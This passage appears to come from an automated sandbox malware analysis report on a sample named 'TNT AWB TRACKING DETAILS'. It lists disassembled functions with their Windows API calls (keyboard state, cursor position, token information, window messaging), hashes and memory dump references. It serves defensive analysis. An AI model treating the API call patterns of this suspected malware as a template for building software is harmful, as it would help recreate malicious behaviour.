                                                    • Instruction Fuzzy Hash: EA51F936A00109DFCB05EF65C985EADBBF5EF09314B1480A9E809AB362CB32ED51DB50
                                                    Function 00F4A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88356798d6791dd922c7bcfba3d81ec878cd108288f531cc99920661cccec56c
                                                    • Instruction ID: 0d67f1a9c8a7599cd3c354f0e3bef4f708db0aa9bd64b60a3b5c5b280e303c70
                                                    • Opcode Fuzzy Hash: 88356798d6791dd922c7bcfba3d81ec878cd108288f531cc99920661cccec56c
                                                    • Instruction Fuzzy Hash: 1641B23AD84118AFD720DF28CC48FA9BFA8EB49320F150165FD1AA72E1C770AD55FA51
                                                    Function 00EC2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 00EC2357
                                                    • ScreenToClient.USER32(00F857B0,?), ref: 00EC2374
                                                    • GetAsyncKeyState.USER32(00000001), ref: 00EC2399
                                                    • GetAsyncKeyState.USER32(00000002), ref: 00EC23A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: 59d03b9a3bdf679eaedd54f8e3fe94817ff7e14359d9fcde4347ffb401f0f918
                                                    • Instruction ID: 7a67115acf5f17934893e4425f97b635d97caf3cda118116b5b4dace8a744711
                                                    • Opcode Fuzzy Hash: 59d03b9a3bdf679eaedd54f8e3fe94817ff7e14359d9fcde4347ffb401f0f918
                                                    • Instruction Fuzzy Hash: 5A41CF3560410AFBCF159F68CD44FE9BBB4FB05324F20431EF928A22A0CB369951EB91
                                                    Function 00F163AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F163E7
                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00F16433
                                                    • TranslateMessage.USER32(?), ref: 00F1645C
                                                    • DispatchMessageW.USER32(?), ref: 00F16466
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F16475
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                    • String ID:
                                                    • API String ID: 2108273632-0
                                                    • Opcode ID: 69f9bb363e803e95eff329b3d4d57f884764666613dd8d9de7e26ddee14dace2
                                                    • Instruction ID: ec9762b49cf3d8820d06a13910d44930fff2ae5bfd508bd332b72837094f8fd6
                                                    • Opcode Fuzzy Hash: 69f9bb363e803e95eff329b3d4d57f884764666613dd8d9de7e26ddee14dace2
                                                    • Instruction Fuzzy Hash: 4031D631E0065AEFDB24CFB4DC44BF67BACAB15720F144165E425C61A1E72594C9F760
                                                    Function 00F18A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F18A30
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00F18ADA
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F18AE2
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00F18AF0
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F18AF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 9c749a90379d487c7da3b29c955676e45a1108f3e93299febdece936f76b86a1
                                                    • Instruction ID: a3324bf2842857d36f369c8cfbee3b0a5189b0c13e7a1fde26a737f979fb3dc1
                                                    • Opcode Fuzzy Hash: 9c749a90379d487c7da3b29c955676e45a1108f3e93299febdece936f76b86a1
                                                    • Instruction Fuzzy Hash: 7A31FF71900219EBCB00CFA8DA4CADE3BB5EF05325F10822AF929E61D0C7B49955EB90
                                                    Function 00F1B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00F1B204
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F1B221
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F1B259
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F1B27F
                                                    • _wcsstr.LIBCMT ref: 00F1B289
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: 1f66b9f94e687234762122eb140c01de8203d2270e5579d705de368fb6e0ce0b
                                                    • Instruction ID: 58c70af9af4fed03fa2f472fc2def056abd89960848afd78b6e7c427d156f3be
                                                    • Opcode Fuzzy Hash: 1f66b9f94e687234762122eb140c01de8203d2270e5579d705de368fb6e0ce0b
                                                    • Instruction Fuzzy Hash: 0021F832604284BBEB165B759C09EBF7B98DF4A760F004139FC08DA161EB719C84A660
                                                    Function 00F4B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4B192
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F4B1B7
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F4B1CF
                                                    • GetSystemMetrics.USER32(00000004), ref: 00F4B1F8
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F30E90,00000000), ref: 00F4B216
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: 895d023092ae051035023ba4274544149f5d6daafedfd87d66bf3e58dac34fd0
                                                    • Instruction ID: 2bc857fa0640aa6378cfec7940cc179d731ee2e065c85e8d2ecf025cb98465bf
                                                    • Opcode Fuzzy Hash: 895d023092ae051035023ba4274544149f5d6daafedfd87d66bf3e58dac34fd0
                                                    • Instruction Fuzzy Hash: F9218D71A10265AFCB109F38DC04B6A3BA4FB56731F154729BD26D71E1E730D921EB90
                                                    Function 00F19307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F19320
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F19352
                                                    • __itow.LIBCMT ref: 00F1936A
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F19392
                                                    • __itow.LIBCMT ref: 00F193A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow$_memmove
                                                    • String ID:
                                                    • API String ID: 2983881199-0
                                                    • Opcode ID: c91926954f565ea44ffc397fecbc5966caaf52cd81d8b0a0e0384c1baa84e48c
                                                    • Instruction ID: 522ba6c4a36dbf0bf3964b6b541fe55394255afd87e9d6b03d6b27173b817c1d
                                                    • Opcode Fuzzy Hash: c91926954f565ea44ffc397fecbc5966caaf52cd81d8b0a0e0384c1baa84e48c
                                                    • Instruction Fuzzy Hash: 1E213A31B042087BDB109A648C99EEE7BEDEB59720F045029FD58E71C0D6F0CD85A7D1
                                                    Function 00F35A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00F35A6E
                                                    • GetForegroundWindow.USER32 ref: 00F35A85
                                                    • GetDC.USER32(00000000), ref: 00F35AC1
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00F35ACD
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00F35B08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: a0e2ec838f77e92dfa93117a35d5dfc2e4f4e751cf132088e1903ce1a891a6d4
                                                    • Instruction ID: b6090a0a91c68cd59940521bead092cdae629ca01b4bbf5416725a0d8b1336cf
                                                    • Opcode Fuzzy Hash: a0e2ec838f77e92dfa93117a35d5dfc2e4f4e751cf132088e1903ce1a891a6d4
                                                    • Instruction Fuzzy Hash: A621C635A00104AFDB04EF64DD88A5ABBE5EF59350F158079FC09D7352CA34AC05EB50
                                                    Function 00EC12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EC134D
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC135C
                                                    • BeginPath.GDI32(?), ref: 00EC1373
                                                    • SelectObject.GDI32(?,00000000), ref: 00EC139C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: c03bbf640237c7abd6e82881627409cbbd96c747f8db132e788003ec8667cd79
                                                    • Instruction ID: b4d6f4d6a23eb2ba9a4626feb584a6506400ff9c7d1ab4823cae7e5d2fa2e9d2
                                                    • Opcode Fuzzy Hash: c03bbf640237c7abd6e82881627409cbbd96c747f8db132e788003ec8667cd79
                                                    • Instruction Fuzzy Hash: 0421513080064CDBDB108F59DD08BB97BE8EB11719F15425BF814A61B1D7719896EF50
                                                    Function 00F1BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: a2b87d0332f574ee42ef6e1d351fe88ead200588ca1d48125c92ce8e4d047966
                                                    • Instruction ID: 4daca2ebaa8de0f0a30bc275fe84ee8dd427418b769e97b9841cbc23a06d1b16
                                                    • Opcode Fuzzy Hash: a2b87d0332f574ee42ef6e1d351fe88ead200588ca1d48125c92ce8e4d047966
                                                    • Instruction Fuzzy Hash: AD01B57360010DBBD2046B126D42FFFB79CDE613A8B044065FE15A6383FB61DE94A2E1
                                                    Function 00F24A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F24ABA
                                                    • __beginthreadex.LIBCMT ref: 00F24AD8
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F24AED
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F24B03
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F24B0A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 24d75cb3d1d486d5800ddf63fb1a6e4dbdcd5d46f47fdd80b00b5ed883add9ff
                                                    • Instruction ID: 8533936bba1c6f15dfe231ce474234ba4370056c21fec41c335aa8699ff0b32c
                                                    • Opcode Fuzzy Hash: 24d75cb3d1d486d5800ddf63fb1a6e4dbdcd5d46f47fdd80b00b5ed883add9ff
                                                    • Instruction Fuzzy Hash: 3811087A90425CBBD7009FA8AC08AEB7FACEB85320F144265F818D3250D6B1D9049BA1
                                                    Function 00F18202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F1821E
                                                    • GetLastError.KERNEL32(?,00F17CE2,?,?,?), ref: 00F18228
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F17CE2,?,?,?), ref: 00F18237
                                                    • HeapAlloc.KERNEL32(00000000,?,00F17CE2,?,?,?), ref: 00F1823E
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F18255
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 6cfab5b9e87992f667d4bd9a104fcf7d0b65ab74e0ffc76a7daf95d400218c77
                                                    • Instruction ID: 94a99f9cc95178e2f50e4f9479f5af0e8ae499c79c51e9517d6acd7d7c54a299
                                                    • Opcode Fuzzy Hash: 6cfab5b9e87992f667d4bd9a104fcf7d0b65ab74e0ffc76a7daf95d400218c77
                                                    • Instruction Fuzzy Hash: EE016D75600248BFDB214FA5DD48DAB7BACEF9B7A4B500429FD09C2220DA318C45EA60
                                                    Function 00F1710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?,?,00F17455), ref: 00F17127
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17142
                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17150
                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?), ref: 00F17160
                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F1716C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                    • String ID:
                                                    • API String ID: 3897988419-0
                                                    • Opcode ID: 1a45cf92129153ca252a05805c4e6844965f223294b7b37420e8a31bb93ef5ed
                                                    • Instruction ID: 4ad3cdc86a9887b93f5af921a6a7a87984cea258e65c37ce773a4eb29b18ef2c
                                                    • Opcode Fuzzy Hash: 1a45cf92129153ca252a05805c4e6844965f223294b7b37420e8a31bb93ef5ed
                                                    • Instruction Fuzzy Hash: 04018476601308BBDB115F64DC44BAA7BBDEF45761F140064FD0DE6220D771DD81ABA0
                                                    Function 00F25244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F25260
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F2526E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F25276
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F25280
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F252BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 740e5b23552c91d390f5d20ae71fa00da4206d234ecf0d06bfbeae565bb546ed
                                                    • Instruction ID: 369211302a5c80c0e815073b0bfa57866df7f7c0a2996158f59d96be9ffdedec
                                                    • Opcode Fuzzy Hash: 740e5b23552c91d390f5d20ae71fa00da4206d234ecf0d06bfbeae565bb546ed
                                                    • Instruction Fuzzy Hash: 38016935D02A2DDBCF00EFE4EC48AEDBBB8FB4AB11F410056E945B21C0CB709554A7A1
                                                    Function 00F1810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F18121
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F1812B
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F1813A
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18141
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F18157
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: b981cd928eb4e51bd09ae8b94f1b39bdad5028509791075ead51822577222cc2
                                                    • Instruction ID: 4bfbb23159fd1186a6c7d21d589542c1359cbe1392e5ba74336a3edf2d3dddef
                                                    • Opcode Fuzzy Hash: b981cd928eb4e51bd09ae8b94f1b39bdad5028509791075ead51822577222cc2
